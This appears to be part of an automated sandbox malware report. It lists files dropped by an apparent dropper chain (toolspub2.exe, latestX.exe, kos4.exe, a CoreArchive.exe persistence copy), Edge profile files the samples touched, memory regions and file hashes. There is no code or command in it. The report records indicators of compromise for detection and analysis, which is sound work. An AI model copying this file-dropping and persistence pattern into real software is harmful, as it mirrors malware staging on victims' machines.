C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,11035472139549631962,4408328530236330928,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=9056 /prefetch:2

Network


Files


memory/2100-140-0x0000000074150000-0x0000000074900000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F15C.exe

MD5 f99fa1c0d1313b7a5dc32cd58564671d
SHA1 0e3ada17305b7478bb456f5ad5eb73a400a78683
SHA256 8a964d8fb52489ba9086bf0ab5cf8ca7822fe698d03e5e6d5174640f52b8c5ee
SHA512 bbee03761f2ffe4ab99d3e2dd02f49460b1100583ceb0e06f2765eff776d3167880a8dbbb8079c659d39fc3cc8e24dfdd8395ced3eeb6a13ef598ba8b9269a25

memory/552-133-0x0000000000400000-0x0000000000480000-memory.dmp

\??\pipe\LOCAL\crashpad_4564_FGRPYJCZTKBPTEWK

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b5f3a0ac3ac0d58071495343c2c1d78a
SHA1 501395d40c17499b5897d1e3ca6decb6f86d3ef1
SHA256 56084d304a135b2f02438050626227e4b676e22f25aff85d1ac1ef34c50a7453
SHA512 cd7c45d3f0ab8d69e8c612b2af70f2a65f0305cd6f1b651835766e0f9633a2a39f8ec3236f01e71222e8e50dada5d967f03ed8856ffc4e37aa48ac4f36b22bc5

memory/4812-165-0x0000000074150000-0x0000000074900000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\14C.exe

MD5 e2ff8a34d2fcc417c41c822e4f3ea271
SHA1 926eaf9dd645e164e9f06ddcba567568b3b8bb1b
SHA256 4f26511d40ad3d781ff1bd4c643f9418b3fd0c4da6b769a1ff9ae4d07d8892d0
SHA512 823d99704b761218b3de8f6b107378b529e7f718557b9e2b57ffb497310c4eccfc35c402bad28cdc2758ef254e55a936949c24468f07fc21e7e3efc0671beec2

memory/2100-170-0x0000000007540000-0x0000000007550000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\14C.exe

MD5 e2ff8a34d2fcc417c41c822e4f3ea271
SHA1 926eaf9dd645e164e9f06ddcba567568b3b8bb1b
SHA256 4f26511d40ad3d781ff1bd4c643f9418b3fd0c4da6b769a1ff9ae4d07d8892d0
SHA512 823d99704b761218b3de8f6b107378b529e7f718557b9e2b57ffb497310c4eccfc35c402bad28cdc2758ef254e55a936949c24468f07fc21e7e3efc0671beec2

memory/5280-171-0x0000000000010000-0x00000000003F0000-memory.dmp

memory/5280-173-0x0000000074150000-0x0000000074900000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0629525c94f6548880f5f3a67846755e
SHA1 40ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256 812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512 f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

C:\Users\Admin\AppData\Local\Temp\7B6.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

memory/4812-203-0x0000000074150000-0x0000000074900000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/5888-209-0x0000000000E80000-0x0000000000E88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7B6.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/5888-220-0x000000001BB80000-0x000000001BB90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/5660-231-0x0000000000400000-0x0000000000461000-memory.dmp

memory/468-232-0x0000000074150000-0x0000000074900000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F0A.exe

MD5 993c85b5b1c94bfa3b7f45117f567d09
SHA1 cb704e8d65621437f15a21be41c1169987b913de
SHA256 cb6c640fbc6289b261bca0ee881bfcc8c4df2e89baaab7a4fed4e0e3b0dc9d37
SHA512 182d6cb6f3e6618375e8e793c6ce5d3c73da8183d4acad8bad60f35242c264260423e22a68ea64022c9c0c61b226edc4dd3791e6947e42c418355baa623e1f24

memory/5660-236-0x00000000001C0000-0x00000000001FE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\138F.exe

MD5 463d1200107d98891f04dbbeece19716
SHA1 03a4071c18909714676b4c85e2b960782a0e7d29
SHA256 e38d2e806efa284c129eca4aff2e81c6cc43f969c5603c2d48efda1a333746e6
SHA512 7b257d1f9bc8bef6879f70786eb5580241c1c0e77a458a6d28eaf8ab1571a054ffaf60f9e485ee9890e14abbc7fb9e9e84627dd9c9a224b24c5cd6041a9d4922

C:\Users\Admin\AppData\Local\Temp\F0A.exe

MD5 993c85b5b1c94bfa3b7f45117f567d09
SHA1 cb704e8d65621437f15a21be41c1169987b913de
SHA256 cb6c640fbc6289b261bca0ee881bfcc8c4df2e89baaab7a4fed4e0e3b0dc9d37
SHA512 182d6cb6f3e6618375e8e793c6ce5d3c73da8183d4acad8bad60f35242c264260423e22a68ea64022c9c0c61b226edc4dd3791e6947e42c418355baa623e1f24

memory/4860-223-0x0000000074150000-0x0000000074900000-memory.dmp

memory/5888-216-0x00007FFAFE230000-0x00007FFAFECF1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/4860-240-0x0000000004C90000-0x0000000004CA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7B6.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

memory/5660-248-0x0000000074150000-0x0000000074900000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7B6.exe

MD5 358dc0342427670dcd75c2542bcb7e56
SHA1 5b70d6eb8d76847b6d3902f25e898c162b2ba569
SHA256 45d1df2aa5755f65a6710f2a4652bedc72f099ff53cb69301aac9a5518276e60
SHA512 2fff83f04c11e8e99817b9a9c173d29d9d4169805872706dd765a1891157960a7e46cd30a40cedd43de5521d96070a67f6eaea18c53d796c294b386bc5b356e5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2854fa2d5d18778d884d14aec0bcfc1d
SHA1 f7ef206915a8c43872a7c513d8b606f9fab71496
SHA256 4fa588be3cd0b4acfc5423e701b59674ce702c4695d1c01878f2009e6699fcfc
SHA512 18856094e7706fa4884a35c8d3a8ac9a77386452f537b2921b67f52833c6d4158ad3422099d9b8313d8af91f695f87478465f10822255464188ca93a8e3d7300

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/5280-172-0x0000000004C50000-0x0000000004CEC000-memory.dmp

memory/6140-253-0x0000000000590000-0x00000000005AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\138F.exe

MD5 463d1200107d98891f04dbbeece19716
SHA1 03a4071c18909714676b4c85e2b960782a0e7d29
SHA256 e38d2e806efa284c129eca4aff2e81c6cc43f969c5603c2d48efda1a333746e6
SHA512 7b257d1f9bc8bef6879f70786eb5580241c1c0e77a458a6d28eaf8ab1571a054ffaf60f9e485ee9890e14abbc7fb9e9e84627dd9c9a224b24c5cd6041a9d4922

memory/6140-254-0x0000000074150000-0x0000000074900000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0629525c94f6548880f5f3a67846755e
SHA1 40ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256 812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512 f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa

memory/6140-261-0x0000000004E90000-0x0000000004EA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 87b57e6f2ed0a49423a67dd6af237dab
SHA1 20d1712bc898d1ead721de20670f0fc35867de5e
SHA256 9bdd771b991257f353e605f79f0352fbb95bada8e98aa371031792420c7e1ead
SHA512 bc9377dfd77d0292c4a5ef6ea27a68367e578710497e3d79bd5fc7a44b0723222e3790ec1eea85307d845d21ef9e807010f15895e7bd7b1a5eedeb8c3e11ecf4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1c307819e53e957b5f26ddb77e63dcbe
SHA1 dd6c8153f91600bdfe9838a9f6b0cb7f8a2f3e26
SHA256 84ac18ca1a3772a470bf5e68cc111b09e128985ff42eb91a0d3ea38fbb2a8957
SHA512 299ba33146fff76bf5272d9de7308e779c59203ebef29bfe3a8138cddb5b56ee756f1aafd1fdd7af71442ccd212480ebf32afedd7437fee49ad0beb94d0f3902

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 87b57e6f2ed0a49423a67dd6af237dab
SHA1 20d1712bc898d1ead721de20670f0fc35867de5e
SHA256 9bdd771b991257f353e605f79f0352fbb95bada8e98aa371031792420c7e1ead
SHA512 bc9377dfd77d0292c4a5ef6ea27a68367e578710497e3d79bd5fc7a44b0723222e3790ec1eea85307d845d21ef9e807010f15895e7bd7b1a5eedeb8c3e11ecf4

memory/5540-289-0x0000000000A70000-0x0000000000B70000-memory.dmp

memory/3772-283-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 87b57e6f2ed0a49423a67dd6af237dab
SHA1 20d1712bc898d1ead721de20670f0fc35867de5e
SHA256 9bdd771b991257f353e605f79f0352fbb95bada8e98aa371031792420c7e1ead
SHA512 bc9377dfd77d0292c4a5ef6ea27a68367e578710497e3d79bd5fc7a44b0723222e3790ec1eea85307d845d21ef9e807010f15895e7bd7b1a5eedeb8c3e11ecf4

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

memory/5280-301-0x0000000074150000-0x0000000074900000-memory.dmp

memory/5936-302-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5936-295-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5540-294-0x0000000000A20000-0x0000000000A29000-memory.dmp

memory/5888-293-0x00007FFAFE230000-0x00007FFAFECF1000-memory.dmp

memory/5680-307-0x0000000002AB0000-0x0000000002EB6000-memory.dmp

memory/5680-308-0x0000000002EC0000-0x00000000037AB000-memory.dmp

memory/5660-336-0x00000000048B0000-0x0000000004911000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 fd20981c7184673929dfcab50885629b
SHA1 14c2437aad662b119689008273844bac535f946c
SHA256 28b7a1e7b492fff3e5268a6cd480721f211ceb6f2f999f3698b3b8cbd304bb22
SHA512 b99520bbca4d2b39f8bedb59944ad97714a3c9b8a87393719f1cbc40ed63c5834979f49346d31072c4d354c612ab4db9bf7f16e7c15d6802c9ea507d8c46af75

memory/4644-331-0x0000000000540000-0x0000000000541000-memory.dmp

memory/5680-344-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5660-348-0x0000000000400000-0x0000000000461000-memory.dmp

memory/5280-352-0x0000000004BC0000-0x0000000004BCA000-memory.dmp

memory/5280-360-0x0000000004BE0000-0x0000000004BE8000-memory.dmp

memory/5660-353-0x0000000074150000-0x0000000074900000-memory.dmp

memory/5280-372-0x0000000004DD0000-0x0000000004F62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

memory/5936-384-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5680-383-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/3320-382-0x00000000084C0000-0x00000000084D6000-memory.dmp

memory/6028-386-0x00007FF753340000-0x00007FF7538E1000-memory.dmp

memory/5280-432-0x00000000053E0000-0x00000000053F0000-memory.dmp

memory/6140-411-0x0000000006540000-0x0000000006702000-memory.dmp

memory/6140-403-0x0000000074150000-0x0000000074900000-memory.dmp

memory/4728-438-0x0000000000400000-0x0000000000612000-memory.dmp

memory/5280-437-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

memory/5280-441-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

memory/4728-442-0x0000000000400000-0x0000000000612000-memory.dmp

memory/5992-451-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e30026c4186f3124603eb127d7bdc330
SHA1 4cadde46b858eb4764a4cf821d76f058e0d48df2
SHA256 ad5be39cce10d33c93030307fc829d3c23c122230d5e5628ff9a56fd196411fb
SHA512 3910fad85654a30639d8da4f2f2cb7ae69b45ee0d700c7015ef12a18326bb8ad3e779971e3a1820128632bc5357f699708f682e97696ef868b1dff008c036822

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\c9f07642-f4dc-4215-b1ae-005f4ffe2ef0.tmp

MD5 d0af832dd9a110d8e50f3c2f4362d490
SHA1 a80079a04586ef67a2caebb5ec0eb08eb07f14e9
SHA256 b9711b974b00b3eb8c609e03a93e59524d039a8e69364ceee463ccad47768b23
SHA512 4e8f6e9f691b4dfbb7c77ec277c61f9008e4e1c92696736cd939682ce0088805bd52241c51fe678ae2a6a230ee44c6603a4cf59daeeb496657bf28bfc7bb7a85

memory/5992-498-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3772-494-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

memory/5992-446-0x0000000000400000-0x000000000041B000-memory.dmp

C:\ProgramData\CoreArchive\CoreArchive.exe

MD5 99faca671ba80a1a5a07b0e05ae29f63
SHA1 1ca1875ac52e2a1f33f513ed7cfcf70467d14025
SHA256 5550b4a952bad35b63eb1e79cd744caa79e1048d8e4bd9fb3efaad33e90c3b8a
SHA512 bea52883067a49864d189246803fd554353bca364b6b378cb6eeb2fca73eb3bea830574f2731fe79c58e4f79d15b3e63a36caff18a29e1e7f46f733d9b900b2d

memory/6140-439-0x0000000006C40000-0x000000000716C000-memory.dmp

memory/4644-609-0x0000000000400000-0x00000000004BE000-memory.dmp

memory/5680-631-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp6093.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp60C8.tmp

MD5 985339a523cfa3862ebc174380d3340c
SHA1 73bf03c8f7bc58b4e28bcbfdd1c2ba52dea5dfb7
SHA256 57c7f10cd97c8db447281ad0f47d4694035056e050b85b81f5a5124f461621a2
SHA512 b5d34c43330f8070b3f353c826a54aecd99b7129a214913a365b66009a1a6744093bf085d3f86681ed40c714d6ebdfff40d99d7bd7a3508a0a0caed6304ac27c

C:\Users\Admin\AppData\Local\Temp\tmp6122.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmp6128.tmp

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Temp\tmp6593.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmp660C.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

memory/5836-858-0x0000000000400000-0x0000000000612000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 09e1c452761dfa13b142db0c38fd935a
SHA1 d6d48f574f5796dea8402e101b1c60824e09acf4
SHA256 b46c82a4fa934fa2254f3cf6c7ac622d581dc917690f80cea61b5e53b86ce495
SHA512 02a3a989f669cb3ea560f06653bfb20bc7e329f6376e5c8861630455f9c097ed37b7675a30665173168ca705935ca7f9c182e5ecd906d8a3edcd09c14ca56736

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 80a77ff5684483b0ac8b167721408c5a
SHA1 f0dfa24e78bbfda84a81ac2eeb7f87c5c921fc9f
SHA256 25d12e256640a55fa0d07c07be25ffea3d7675eb1924210de96d99466043163a
SHA512 620ed741c7eefffc41519303e4cb074d2d65df034c9bb971be35b0f45a0633326c83030160d5a1d42d83ae2a57b762a1dc2dc48789936a1172282791c1173bdc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe587cad.TMP

MD5 0de5705a4b4104e3a8d1a9afdeb4eec0
SHA1 45c72c2c11656553a02057252f9e29a31686a643
SHA256 e67e3616a5be95555cb3470a2f2f4467095384bdcc9544affa47f90bf415afa2
SHA512 4b80f842efc6728a76f2c93881a585a52b5d0fde9c5f0aaa3ae8c0dd2b170edab4e49a997fb03c3a85dcf67cddd6e73da4f87f566f2f8ab362022143283dedf3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 b3bda68a75225727af48522d2029911f
SHA1 6c4c9a929ee8f951a181e9770111c9692a99f5b8
SHA256 614e023de6951ca6872f749d8d2684ae293b4681620ce22c05d682b02ca1f8aa
SHA512 81fb74b05c4c88dc0e9db0c3a44663ab9bd182c50c99a71ea0824fac7d9346ab24ca6d478b9e515b3257bb9660f9042bd55a802a4c01bcce3ea4bd88b0e1e3b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 8bb1f5d14524ebbef90e8970ee33ea36
SHA1 c766ba87341d3a6767c53e408a2af029f292f43d
SHA256 89f08dab0733492c3fb950621cabd9d4ee0cde4bb3485d74e4a76ad273d8f729
SHA512 414e162ee62c3c23830f0b60ca11555f956687c327db20bca229ec9ec32b7eed21a51019ac38682c5586f76817222b897a1c37c7140a4b76fe7ffb69ca4d481c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f9ae91562407b3a7fd3c2dc6a9efde93
SHA1 5dc30b44acc843decdbfe07ecf512f87f1e55fea
SHA256 569d1f8e1853ef200f656649a212e6ea083346cc43577563a18f694cf960dd8a
SHA512 899112a0ca4b4e2e6edc39f185762752d7bfc717a014ecfd167282da9ac45263b948a7987b15cf6f6ff89e7c20f712e0a59fe593a1a36c37a3e5802871411ef6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 33c0c6f1556adc9aa8f4ef30b53b1d10
SHA1 5c34dd64ed4b0270f4a77121887b8d11c2037a77
SHA256 4f176d21cd2b56d086dd601c8149bd1f846c8dca8634cce288af4ba882fde0df
SHA512 2d680222cdfd4eb2ed2791d427aa212ae63dc9c9cc2273e7bda4c0e486a0c5d028013271183eb4fb6a6e355996c5c9489df97de3963dc43d4bd8eb0e950c9d7a

memory/5680-959-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 7cb53692ec44d0bb380817fbb3b9b998
SHA1 648613522afba16e635c991d1a41fc900ce1098d
SHA256 af500ac418e9851f34c644fcbb4775756c09384a8bd68e3f2521fe35c7e6ee3e
SHA512 0e59d8453f38e941e2a386b7a656ac46db55aac0e5d56b8fe791274ef1997834b6896baa686dc162d1cf1a1c0cdc0d3a077072f888f91d67d578463bcb6bbf49

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fcatbqpn.41e.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5836-1259-0x0000000000400000-0x0000000000612000-memory.dmp

